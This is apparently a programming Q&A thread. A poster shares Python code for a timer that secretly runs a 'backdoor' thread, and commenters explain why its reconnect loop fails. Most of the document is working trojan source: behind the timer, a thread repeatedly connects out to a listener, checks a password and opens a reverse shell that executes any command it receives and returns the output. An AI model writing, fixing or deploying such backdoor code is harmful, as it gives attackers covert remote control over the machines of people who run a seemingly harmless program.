# How to catch exception when socket fails to connect

Tags: python, sockets

I've tried to make a timer with a backdoor just for fun and it works, when i start to listen with netcat before i start the script.
('nc -l 1234') It would be nice if i could start the script and make the backdoor thread try to connect until it finally connects.(Use netcat after starting the script) But i always get connection refused error and 'OSError: [Errno 22] Invalid argument'

Ive tried to make an own function for connecting and call both functions from one function which the tread calls but it didn't work.

Imports:

```
import socket
import subprocess
import threading
import time
```

Declaring variables and a socket:

```
port = 1234
passw = 'Password'
host = '192.168.10.128'
connectedToSlave = False

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
```

Timer in you were wondering:

```
def clock():
    startTimerOrQuit = input("Press enter to start the timer. Send 'q' to exit. > ")
    if(startTimerOrQuit == 'q'):
        exit(0)
    start = time.time()
    input("Press enter to stop the timer. > ")
    with print_lock:
        print("It took {} seconds.".format(time.time()-start))
    clock()
```

This is my login func. which is the problem:

```
def login():
    while True:
        try:
            s.connect((host, port))
            break
        except ConnectionRefusedError as e:
            with print_lock:
                print("ERRRRRRRRRRRRRRRR > ", e, '\n')
                continue
    with print_lock:
        print("While done")
    s.send("Login > ".encode('utf-8'))
    usrPassw = s.recv(1024)

    if(usrPassw.decode('utf-8').strip() == passw):
        s.send("Successfully Connected!\n".encode('utf-8'))
        s.send("> ".encode('utf-8'))
        revShell()
    else:
        s.send("Wrong Password!\n".encode('utf-8'))
        login()
```

My reverseShell func. works fine but if you want to see:

```
def revShell():
    global s
    while True:
        inData = s.recv(1024)

        if(inData.decode('utf-8').strip() == 'logout'):
            break

        sp = subprocess.Popen(inData, shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE, stdin = subprocess.PIPE)
        output = sp.stdout.read() + sp.stderr.read()
        s.send(output)
        s.send('> '.encode('utf-8'))
```

Starting the threads:

```
tt = threading.Thread(target = clock, name = "Clock Thread")
tt.start()

bdt = threading.Thread(target = login, name = "Backdoor Thread")
bdt.start()
```

I want it to run the timer normally and try to connect to the netcat listener and if it fails try again with for ex. a 10 sec delay. But i get Errno[61] ConnectionRefused and OSError Errno[22] Invalid argument.

Comment: 1. You can't reconnect a socket that has already tried to connect, even if the connect failed. You have to close the socket and create a new one. 2. There are other reasons for connection failure besides refusal.

Comment: @user207421 you should put nr. 1 as an awnser. It was the flaw.

Comment: @user207421 This isn't universally true, though it may be true for some OSes. On linux, one can call `connect` to a non-listening port (which fails), then call `connect` again on the same socket to a listening port with success.